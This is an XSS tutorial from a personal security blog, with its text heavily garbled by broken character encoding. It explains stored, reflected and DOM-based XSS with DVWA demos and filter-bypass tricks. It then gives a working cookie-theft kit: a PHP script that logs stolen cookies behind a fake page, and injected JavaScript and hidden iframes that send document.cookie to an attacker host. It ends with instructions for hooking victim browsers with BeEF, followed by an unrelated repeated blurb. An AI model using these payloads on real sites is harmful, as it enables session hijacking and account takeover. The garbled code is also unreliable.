Email : ahmed.elhady.mohamed@gmail.com website: www.inosec!all.tk blog : www."nosec!all.blogspot.com#
$%& 'ntroduction wikipedia deinition or (SS is )Cross-site scripting *XSS+ is a type o computer insecurity ,ulnerability typically ound in Web applications *such as web browsers through breaches o browser security+ that enables attackers to in-ect client-side script into Web pages ,iewed by other users. A cross-site scripting ,ulnerability may be used by attackers to bypass access controls such as the same origin policy. Cross-site scripting carried out on websites accounted or roughly ./.01 o all security ,ulnerabilities documented by Symantec as o 2//3.4heir eect may range rom a petty nuisance to a signiicant security risk5 depending on the sensiti,ity o the data handled by the ,ulnerable site and the nature o any security mitigation implemented by the site6s owner.7 Simply 6(SS6 also known as 6CSS6 *Cross Site Scripting5 Easily conused with 6Cascading Style Sheets6+ is a ,ery common ,ulnerability ound in Web Applications5 6(SS6 allows the attacker to in-ect malicious code 5 the reason o that is the de,eloper trusts user inputs5 or mis iltering issues 5 then send back user input data to the client browser so the malicious code will e8ecute. $%& (SS is 9angerous (SS is really dangerous 5 it6s se,erity is :igh5 because it could change the website 9;M and could lead to stealing credentials o the administrator 5 in these cases the attacker can control and compromise the whole application. $%& What does the attacker want to achie,e< Changing Setting Cookie thet =alse Ad,ertising Steal a =orm 4okens to make CS>= Easier And more 5 you ha,e to be creati,e to e8ploit (SS.
$%& (SS 4ype 4here are 4hree 4ypes o (SS ?ersistent *Stored+ (SS Attack is stored on the website5s ser,er @on ?ersistent *relect+ (SS user has to go through a special link to be e8posed 9;M-based (SS problem e8ists within the client-side script we will discuss each kind o these in details 5 as you will see. $%& ?ersistent *Stored+ (SS
wikipedia deinition :4he persistent *or stored+ (SS ,ulnerability is a more de,astating ,ariant o a cross-site scripting law: it occurs when the data pro,ided by the attacker is sa,ed by the ser,er5 and then permanently displayed on AnormalA pages returned to other users in the course o regular browsing5 without proper :4MB escaping. A classic e8ample o this is with online message boards where users are allowed to post :4MB ormatted messages or other users to read. Simply ?ersistent (SS is occurs when the de,eloper stores the user input data into database ser,er or simply writing it in a ile without a proper iltration 5 then sending them again to the client browser.
$%& ?ersistent *Stored+ (SS 9emo :ere is a ?:? code that suers orm ?ersistent (SS: C<php i*isset*DE?;S4$6btnSign6&++ F DmessageGtrim*DE?;S4$6mt8Message6&+H DnameGtrim*DE?;S4$6t8t@ame6&+H ## SanitiIe message input Dmessage G stripslashes*Dmessage+H Dmessage G mysJlErealEescapeEstring*Dmessage+H
## SanitiIe name input Dname G mysJlErealEescapeEstring*Dname+H DJuery G A'@SE>4 '@4; guestbook *comment5name+ KABLES * 6Dmessage656Dname6+HAH DresultGmysJlEJuery*DJuery+ or die*6CpreM6.mysJlEerror*+.6C#preM6+H N <M the two parameters in that code )message7 and )name7 are not sanitiIed properly 5the 5we store these parameters into the guestbook table5 So when we displaying these parameters back the client browser5 it will e8ecute the malicious Oa,aScript code. =or 9emonstrating this we will e8ploit 9KWA application.
Ater Submitting this orm 5 ;ur OS code has been e8ecuted
:ere we are in-ecting our Oa,aScript code CscriptMalert*)here is stored (SS7+HC#scriptM $%& @on ?ersistent *>elected+ (SS
Wikipedia deinition 4he non-persistent *or reflected+ cross-site scripting ,ulnerability is by ar the most common type. 4hese holes show up when the data pro,ided by a web client5 most commonly in :44? Juery parameters or in :4MB orm submissions5 is used immediately by ser,er-side scripts to generate a page o results or that user5 without properly sanitiIing the reJuest. $%& @on ?ersistent *>elected+ (SS 9emo :ere is a php code that suers orm >elected (SS C<php i*ParrayEkeyEe8ists*AnameA5DEQE4+ R RDEQE4$6name6& GG @LBB RR DEQE4$6name6&GG66+F DisemptyGtrueH N elseF echo 6CpreM6H echo 6:ello6 . DEQE4$6name6&H echo 6C#preM6H N
<M AS you can see that the )name7 parameter doesn6t sanitiIed and echo back to the user 5 so when the user in-ect a malicious OS code 5 't will e8ecute. @ow we will in-ect our malicious -s Code 5 =or demonstrating we will in-ect CscriptMalert*#8ss#+C#scriptM =or 9emonstrating this we will e8ploit 9KWA application
will in-ect an alert bo8 Code )CscriptMalert*A8ssA+C#scriptM7
:ere is the ,ulnerable bo8 [+] DOM based XSS Wikipedia deinition is 9;M-based ,ulnerabilities occur in the content processing stages perormed by the client5 typically in client-side Oa,aScript. 4he name reers to the standard model or representing :4MB or (MB contents which is called the 9ocument ;b-ect Model *9;M+ Oa,aScript programs manipulate the state o a web page and populate it with dynamically-computed data primarily by acting upon the 9;M.
simply that type occurs on the -a,ascript code itsel that the de,eloper use in client side or e8ample AA typical e8ample is a piece o Oa,aScript accessing and e8tracting data rom the L>B ,ia the location.S 9;M5 or recei,ing raw non-:4MB data rom the ser,er ,ia (MB:ttp>eJuest5 and then using this inormation to write dynamic :4MB without proper escaping5entirely on client side.A
:ere is the url : 8ssEr#<nameGAMCscriptMalert*A8ssA+C12=scriptM [+] DOM based XSS Demo Suppose the ollowing code is used to create a orm to let the user choose his#her preerred language. A deault language is also pro,ided in the Juery string5 as the parameter )deault7. we will use the ollowing code or demonstration purposes: CselectM CscriptM document.write*AC;?4';@ ,alueG"MA%document.location.hre.substring *document.location.hre.inde8;*AdeaultGA+%.+%AC#;?4';@MA+H document.write*AC;?4';@ ,alueG2MEnglishC#;?4';@MA+H C#scriptM C#selectM 4he page is in,oked with a L>B such as: http:##www.some.site#page.html<deaultG=rench
A 9;M Tased (SS attack against this page can be accomplished by sending the ollowing L>B to a ,ictim: http:##www.some.site#page.html<deaultGCscriptMalert*document.cookie+C#scriptM
4he original Oa,ascript code in the page does not e8pect the deault parameter to contain :4MB markup5 and as such it simply echoes it into the page *9;M+ at runtime. 4he browser then renders the resulting page and e8ecutes the attackerUs script:
alert*document.cookie+ @ow we6,e discussed all types o (SS 5 so lets talk about some ad,anced techniJues. [+] Advanced Techniques there are some a,oidance 4echniJues can be taken to protect a against (SS e8ploits but they are not implementing well or e8ample : 4ons o sites may seem ,ulnerable but not e8ecuting the code that occurs because some kind o iltration methods and those may can be bypassed 5we will demonstrate most o them.
here is the ,ulnerable code that suers rom relected 8ss 5 that has a iltration : C<php i*ParrayEkeyEe8ists *AnameA5 DEQE4+ RR DEQE4$6name6& GG @LBB RR DEQE4$6name6& GG 66+F Disempty G trueH N else F echo 6CpreM6H echo 6:ello 6 . strEreplace*6CscriptM65 665 DEQE4$6name6&+H echo 6C#preM6H N <M
as you can see 5in the pre,ious code 5 the de,eloper replace the string that called ACscriptMA with a @ull string AA . Some common methods to bypass ilteration is that you -ust ha,e to replace the string ACscriptMA with ACSC>'?4MA because the de,eloper search or lowercase o ACscriptMA 5 so we bypass it by change our script to CSC>'?4M.......C#SC>'?4M
:ere is an other way to bypass the pre,ious ilteration Cscript typeGte8t#-a,ascriptMalert*A(SSA+C#scriptM ?lease note its bad practice to use alert*A(SSA+ to test or (SS because most o known sites block the keyword (SS beore.
[+]MT!OD ) # magic quotes *i$tration in this 4echniJue 5 the de,eloper uses techniJue that called magic Juotes iltration 5by using a ?:? unction called Aaddslashes*+A that add slash beore any special chars. So ;ur traditional Oa,aScript code doesn6t work there are many ways to bypass that ilter 5 we will discuss two o them
"- the easiest way to bypass it is Oust 9;@4 LSE magic Juotes simple is that 5 or e8ample declaring a ,ariable and assigned 5 it to a number 5 then alert that ,ariable.
AS you can see here: CscriptM,ar ,alG "H alert*,al+C#scriptM
2- this way is some what tricky 5 in this way we use a built-in =unction that con,ert 9ecimal ,alues into ASC'' ,alues 5 you can ind a complete table o ASC'' here http:##www.asciitable.com# this will help you write what you want ;> you can use hackbar iro8 add-ons to help you on con,erting ASC'' to decimal 'n my e8amples ill be writing A(SSA this is the ollowing code A"2/ ""0 ""0A5 ;k we now got the 9ecimal ,alue o our string5we need to know what unction ' n -a,ascript con,erts this to ASC'' this unction called AString.romCharCode*+A5and to use this with alert as e8ample 5 you dont need to use Juotes any more.
CscriptMalert*String.romCharCode*"2/5 ""05 ""0+C#scriptM ;k now this will display or message in this case A(SSA5 this method is ,ery useul or bypassing magic Juotes. [+]!o' Can an Attac+er Stea$ coo+ies, At irst glance you hear about Stealing Cookies 5 you may think it need a hard work to implement or e,en to understand 5 but i tell you that is so simple 5 -ust you will need some programming background and (SS Kulnerability 5Simple is that .
the Scenario o stealing cookie is that 5 We will create a ?:? ile called collectEcookie.php then we will upload it to any webhosting company 5 ater that we will in-ect a -a,a script code that will send Cookies to our malicious website 5 When the php ile recie,e the Cookie inormation 5 it will sa,e it in aile called stolenEcookie.t8t 4o can steal cookie 5 we need to some issues : A ?:? Script that will recie,e the cookie the -a,ascript code that will steal the cookie and send it to our malicious site a web hosting company that will host our php ile [+] -irst # co$$ect.coo+ie/php :ere is the ?:? script that will use5 to collecting Cookie and sa,e them into stolenEcookie.t8t C<php DcollectedCookieGD:44?EQE4EKA>S$AcookieA&H DdateGdate*Al ds o = V h:i:s AA+H DuserEagentGDESE>KE>$6:44?ELSE>EAQE@46&H DileGopen*6stolenEcookie.t8t656a6+H write*Dile5A9A4E:Ddate RR LSE> AQE@4:DuserEagent RR C;;W'E:Dcookie XnA+H close*Dile+H echo 6CbMSorry 5 this page is under constructionC#bMC#brMC#brM?lease ClickCa hreGAhttp:##www.google.com#AMhereC#aM to go back to pre,ious page 6H <M So lets understand what the script will do : DcollectedCookieGD:44?EQE4EKA>S$AcookieA&H in this line we will store the data that is stored in a get ,ariable called cookie then store it in a,ariable called collectedCookie DdateGdate*Al ds o = V h:i:s AA+H here we store the date o the connection ;ccurs 5 it tells us when these cookies ha,e been stolen.
DuserEagentGDESE>KE>$6:44?ELSE>EAQE@46&H here we store the userEagent o the ,ictim or urther attacks i it needs to. DileGopen*6stolenEcookie.t8t656a6+H here we create a ile called stolenEcookie.t8t that has ,ictim6s cookie inormation write*Dile5A9A4E:Ddate RR LSE> AQE@4:DuserEagent RR C;;W'E:DcollectedCookie XnA+H here we sa,e the data as this ormat *)9A4E: RR LSE> AQE@4 RR C;;W'E7+ close*Dile+H her we close the ile handle echo 6CbMSorry 5 this page is under constructionC#bMC#brMC#brM?lease ClickCa hreGAhttp:##www.google.com#AMhereC#aM to go back to pre,ious page 6H here we print message on the screen *)Sorry 5 this page is under construction7+ and gi,e him a link to click on it that send it to google. :ere we ha,e inished the irst ilecthat will collect the cookie inormation [+] Second # 0avascript code :ere is the Oa,aScript code that we will in-ect into the ,ictim ser,er or browser. We can in-ect any one o these scripts : Ca onclickGAdocument.locationG6http:##"23././."#collectEcookie.php< cookieG6%escape*document.cookie+HA hreGAYAMClick here or 9etailsC#aM this script need user interaction because it print a link to the user 5 i the user clicks on that link 5the redirection to our site with the cookie inormation will be 9one. Cirame widthG6/6 heightG6/6 rameborderG6/6 srcG6CscriptMdocument.locationG6http:##"23././."#collectEcookie.php< cookieG6%escape*document.cookie+HC#scriptM6 #M 4his script doesn6t need user interaction 5here we will in-ect an irame in the ,ictim website and it6s hidden so the ,ictim can6t see that 5and the connection will be done.
=inally we will ind the cookie by browsing the ile that called stolenEcookie.t8t :ere is a ,ideo that demonstrate how to steal a cookie : http:##www.youtube.com#watch<,GZeByOnhI!ak
[+] 1hat is 2e-, TeE= is acronym or Trowser E8ploitation =ramework 5 it6s used to collect alot o Iombies and do alot o e8citing attacks on those Iombies 5 that gi,e us agreat en,iroment because it makes the hard work instead o us. 4hanks to a web application known as bee *Trowser e8ploitation ramework+ that helps us to collect a lot o Iombies*the ,ictim in a botnet is called a Iombie+ and it6s an easy an automated process. here is the deination o TeE= rom the ;icial site : )4he Trowser E8ploitation =ramework *TeE=+ is a powerul proessional security tool. TeE= is pioneering techniJues that pro,ide the e8perienced penetration tester with practical client side attack ,ectors. Lnlike other security rameworks5 TeE= ocuses on le,eraging browser ,ulnerabilities to assess the security posture o a target. 4his pro-ect is de,eloped solely or lawul research and penetration testing. TeE= hooks one or more web browsers as beachheads or the launching o directed command modules. Each browser is likely to be within a dierent security conte8t5 and each conte8t may pro,ide a set o uniJue attack ,ectors. 4he ramework allows the penetration tester to select speciic modules *in real-time+ to target each browser5 and thereore each conte8t. 4he ramework contains numerous command modules that employ TeE=6s simple and powerul A?'. 4his A?' is at the heart o the ramework6s eecti,eness and eiciency. 't abstracts comple8ity and acilitates Juick de,elopment o custom modules.7 Vou can dowload TeE= rom http:##beepro-ect.com#
[+] !o' to use 2e-, Tee is installed by deault in Tack4rack 0 >2 distribution 5 you can download it rom the oicial site: http:##www.backtrack-linu8.org#downloads# 5 4o open and conigure it click on the application menu button and then go to Tacktrack -M E8ploitation 4ools -M Social Engineering 4ools-MTeE= (SS =ramework-MFTee ;> bee-@QN. we will discuss bee-ng 5 Ater running the page we will see some thing like that
4hen you can browse the bee control banel rom http:##"23./.".":[///#ui#panel and use username and password )bee7#7bee7
Vou will need to in-ect that Oa,aScript code to the ,ictim ser,er or client to can hook the Iombies 5 here is the code : Cscript typeG7te8t#-a,ascript7 srcG7http:##"23././.":[///#hook.-s7MC#scriptM :ere you can ined the hooked and online Iombie
:ere you can see the hooked browsers lets take alook to Command tab
:ere is the commands tab that has all modules and e8ploits
As you can see there are alot o e8ploit sections you can use5=or e8ampe we will use a module misc-Malert dialog 5 you can choose any module you wanna use here is the result as we e8pected 5 the alert bo8 is e8ecuted and the message is poped up
now as you can see its automated process 5 -ust all you need is to conigure and module then launch it 5 Simple is that.it deser,es to mention there is a metasploit integration with bee 5 you can see a metasploit module in the commands tab5it deser,es a try to igure out how strong is that5go to metasploit 5 you will see a page where you can choose any o metasploit e8ploits and payloads and set the options or the payload. =or more inormation about bee 5 you can ind the wiki page here : https:##github.com#beepro-ect#bee#wiki
$%& Conclusion as we can see our OS code has been e8ecuted5 so we can e8ecute any malicious OS shellcodes that are out there on the '@4E>@E45 TeE= Qi,es tons o unctionalities to the attacker 5 so we can do collect inormation or urther attacks 5could reach to get a remote shell. We6,e inished this tutorials and i hope they are useul or you guys and there are a lot o Qreat and e8citing 4utorials5will be out there.
JavaScript Fundamentals: JavaScript Syntax, What JavaScript is Use for in Website Development, JavaScript Variable, Strings, Popup Boxes, JavaScript Objects, Function, and Event Handlers
JavaScript Fundamentals: JavaScript Syntax, What JavaScript is Use for in Website Development, JavaScript Variable, Strings, Popup Boxes, JavaScript Objects, Function, and Event Handlers: JavaScript Syntax, What JavaScript is Use for in Website Development, JavaScript Variable, Strings, Popup Boxes, JavaScript Objects, Function, and Event Handlers